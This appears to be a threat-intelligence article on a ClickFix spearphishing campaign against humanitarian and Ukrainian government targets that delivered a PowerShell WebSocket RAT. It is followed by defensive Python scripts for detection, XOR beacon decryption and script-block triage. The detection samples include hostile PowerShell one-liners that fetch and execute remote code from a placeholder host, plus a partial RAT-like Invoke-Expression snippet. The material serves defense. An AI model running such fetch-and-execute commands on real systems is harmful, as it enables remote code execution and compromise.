A sophisticated spearphishing campaign has emerged targeting humanitarian organizations and Ukrainian government agencies, leveraging weaponized PDF attachments and fake Cloudflare verification pages to distribute a malicious WebSocket-based remote access trojan.
The operation, first uncovered in early October 2025, demonstrates a remarkable degree of operational planning and infrastructure compartmentalization, with the threat actors maintaining their campaign for six months before executing their strike.
The campaign specifically targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF, and regional government administrations across Ukraine, using emails impersonating the Ukrainian President's Office.
When recipients opened the malicious PDF and clicked the embedded link, they were directed to a convincing fake Cloudflare DDoS protection gateway that appeared to be a legitimate security verification page.
PDF document page (Source – SentinelLABS)
The attackers had registered the domain zoomconference.app to mimic a legitimate Zoom conference service, hosting the malicious infrastructure on Russian-owned VPS servers in Finland.
The sophistication of this operation extends beyond its initial deception tactics. SentinelLABS researchers identified that the attackers maintained their infrastructure for only 24 hours before shutting down the public-facing domains while preserving their backend command-and-control servers, demonstrating professional-grade operational security.
The campaign infrastructure timeline revealed the attackers began operations in March 2025, with SSL certificates issued in September, suggesting meticulous preparation before the October strike.
The ClickFix Infection Mechanism and Multi-Stage Payload Delivery
The core of PhantomCaptcha's effectiveness lies in its implementation of the ClickFix social engineering technique, a method increasingly adopted by threat actors since mid-2024.
After the fake Cloudflare page loads, victims encounter a simulated reCAPTCHA interface with an "I'm not a robot" checkbox.
Clicking this checkbox triggers a popup containing instructions written in Ukrainian, directing users to copy a token and paste it into the Windows Run dialog using the keyboard shortcut Windows+R.
This seemingly innocuous action executes malicious PowerShell code that initiates the infection chain.
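The Run-dialog step leaves a distinctive footprint on the endpoint: PowerShell spawned directly by the shell (explorer.exe) with a one-liner that fetches and evaluates remote content. The following detection sketch is an added example, not code from the article or from SentinelLABS; it scores constructed process-creation events whose field names mirror Sysmon Event ID 1 (an assumption about the log source), and the URL in the samples is a placeholder.

```python
"""Flag process-creation events consistent with a ClickFix-style Run-dialog launch.

Sample events are constructed for this example; the field names are modelled on
Sysmon Event ID 1 but that mapping is an assumption, not taken from the article.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


# Cues that a one-liner typed into Win+R pulls a script from the network and runs it.
REMOTE_FETCH = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|Net\.WebClient|\bcurl\b",
    re.I,
)
EVALUATE = re.compile(r"Invoke-Expression|\biex\b|-EncodedCommand|-enc\b|-ec\b", re.I)
HIDE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)


def score_event(ev: ProcessEvent) -> int:
    """Return 0-3: one point per hallmark cue, only for PowerShell launched under explorer.exe."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0
    # The Run dialog is part of the shell, so its children report explorer.exe as parent.
    # Narrow by design: variants that pivot through cmd.exe need a separate rule.
    if not ev.parent_image.lower().endswith("explorer.exe"):
        return 0
    return sum(1 for pattern in (REMOTE_FETCH, EVALUATE, HIDE) if pattern.search(ev.command_line))


def flag_clickfix(events, threshold: int = 2):
    """Return the event IDs whose score reaches the threshold (two cues by default)."""
    return [ev.event_id for ev in events if score_event(ev) >= threshold]


# Constructed sample events (not real telemetry). Event 1 mimics a pasted ClickFix
# token; event 4 is a legitimate admin launching a local script; event 5 hides the
# payload behind -enc but fetches nothing in-line.
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -nop -w hidden -c "iex (iwr http://example.invalid/token -UseBasicParsing).Content"'),
    ProcessEvent(2, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent(3, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "iex (iwr http://example.invalid/token).Content"'),
    ProcessEvent(4, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(5, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.event_id, score_event(ev))
    print("flagged:", flag_clickfix(SAMPLE_EVENTS))
```

The parent-process constraint is what separates a pasted Run-dialog command from the same one-liner executed by a scheduled task or a management agent; the cue threshold keeps a bare `powershell.exe` console launch from alerting.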
Infection paths (Source – SentinelLABS)
The underlying mechanism relies on a JavaScript function named copyToken() that downloads and executes a PowerShell script.
The attackers distributed three stages of payloads, beginning with a heavily obfuscated 500KB PowerShell downloader that obscured simple download functionality through massive code obfuscation techniques.
The second stage performed comprehensive system reconnaissance, gathering computer names, domain information, usernames, process IDs, and hardware identifiers through system UUID retrieval, encrypting this data using a hardcoded XOR key before transmission.
The final payload delivered a WebSocket-based remote access trojan capable of receiving arbitrary commands encoded in Base64-formatted JSON messages.
This lightweight backdoor connected to remote servers and executed commands using PowerShell's Invoke-Expression cmdlet, granting attackers full remote command execution capabilities and data exfiltration access.
The malware disabled PowerShell command history logging to prevent forensic analysis, representing a deliberate effort to cover operational tracks while maintaining persistent access to compromised systems.
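A hardcoded repeating XOR key gives the reconnaissance beacon no real confidentiality: XOR is its own inverse, so an analyst with a captured blob and one key-length of predictable plaintext recovers the key, and with it every field the stage collected. The script below is an added example, not the second stage's own format or code; the record layout, field names and key are constructed for the demonstration, and it assumes only that the beacon is a JSON object whose first field name is known.

```python
"""Decrypt and key-recover a repeating-XOR beacon of the kind described.

Everything here is constructed for the example: the record layout, the field
names and the key are not taken from the real second stage.
"""
import json
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """C[i] ^ P[i] = K[i mod key_len], so key_len bytes of known plaintext yield the whole key."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


# Constructed reconnaissance record mirroring the field categories the article lists.
RECON = {
    "host": "WS-FIN-01",
    "domain": "CORP",
    "user": "analyst",
    "pid": 4321,
    "uuid": "00000000-0000-0000-0000-000000000000",
}
KEY = b"K3y!"  # constructed key, stands in for whatever the real stage hardcodes


def encrypt_beacon(record: dict, key: bytes = KEY) -> bytes:
    return xor_bytes(json.dumps(record, separators=(",", ":")).encode(), key)


def decrypt_beacon(blob: bytes, key: bytes) -> dict:
    return json.loads(xor_bytes(blob, key).decode())


def recover_beacon(blob: bytes, known_prefix: bytes = b'{"host":"'):
    """Try key lengths up to len(known_prefix); the first that yields valid JSON wins.

    Wrong lengths garble every byte past the known prefix, so the JSON parse
    (or the UTF-8 decode) fails and the loop moves on.
    """
    for key_len in range(1, len(known_prefix) + 1):
        key = recover_key(blob, known_prefix, key_len)
        try:
            return key, decrypt_beacon(blob, key)
        except ValueError:  # JSONDecodeError and UnicodeDecodeError both subclass it
            continue
    raise ValueError("no key length up to the known prefix produced a JSON record")


if __name__ == "__main__":
    blob = encrypt_beacon(RECON)
    key, record = recover_beacon(blob)
    print("recovered key:", key, "record:", record)
```

Known plaintext is rarely scarce in practice: a JSON beacon always starts with `{"` and its first field name, which is more than enough for short keys. The same reasoning is why XOR with a fixed key should never be mistaken for encryption when reviewing one's own telemetry agents.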
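Even with console history switched off, PowerShell script block logging (Event ID 4104) still records the text of what ran, so the three traits described above can be matched there. The triage function below is an added example, not code from the article or from SentinelLABS; the script samples are constructed, and the history-disabling pattern it looks for (the PSReadLine `-HistorySaveStyle SaveNothing` option) is one plausible method assumed for illustration, since the article does not say which mechanism the malware used.

```python
"""Triage PowerShell script block text for the RAT traits described in the article.

The sample scripts are constructed for this example. The history-disabling
pattern (PSReadLine's -HistorySaveStyle SaveNothing) is an assumed method; the
article does not name the mechanism the malware used.
"""
import re

INDICATORS = {
    # .NET WebSocket client used from PowerShell
    "websocket_client": re.compile(r"System\.Net\.WebSockets\.ClientWebSocket", re.I),
    # Pieces of a Base64 -> JSON -> Invoke-Expression command path
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "json_parse": re.compile(r"ConvertFrom-Json", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    # Assumed anti-forensics method: turning off PSReadLine history persistence
    "history_disabled": re.compile(r"Set-PSReadLineOption\b[^\n]*-HistorySaveStyle\s+SaveNothing", re.I),
}


def triage(script_text: str) -> dict:
    """Map each indicator name to whether it appears in the script block."""
    return {name: bool(pattern.search(script_text)) for name, pattern in INDICATORS.items()}


def verdict(script_text: str) -> str:
    """'rat-like' when a WebSocket client feeds decoded input into Invoke-Expression,
    'suspicious' for dynamic evaluation or history tampering alone, else 'clean'."""
    hits = triage(script_text)
    if hits["websocket_client"] and hits["base64_decode"] and hits["invoke_expression"]:
        return "rat-like"
    if hits["invoke_expression"] or hits["history_disabled"]:
        return "suspicious"
    return "clean"


# Constructed script block samples (not recovered malware). The RAT-like one only
# carries the indicator lines; the connection and receive loop are left out.
RAT_LIKE = """
$ws = New-Object System.Net.WebSockets.ClientWebSocket
# ... connect and receive a frame into $msg ...
$task = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($msg)) | ConvertFrom-Json
Invoke-Expression $task.command
Set-PSReadLineOption -HistorySaveStyle SaveNothing
"""

BENIGN = r"Get-Process | Where-Object CPU -gt 100 | Export-Csv C:\logs\proc.csv"

ADMIN_DYNAMIC = "$cfg = Get-Content cfg.json | ConvertFrom-Json; Invoke-Expression $cfg.cmd"

if __name__ == "__main__":
    for label, text in (("rat", RAT_LIKE), ("benign", BENIGN), ("admin", ADMIN_DYNAMIC)):
        print(label, verdict(text), triage(text))
```

The verdict tiers matter for alert volume: dynamic evaluation alone is common in legitimate admin scripts, so it only warrants review, while the full WebSocket-decode-evaluate chain is specific enough to page on.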
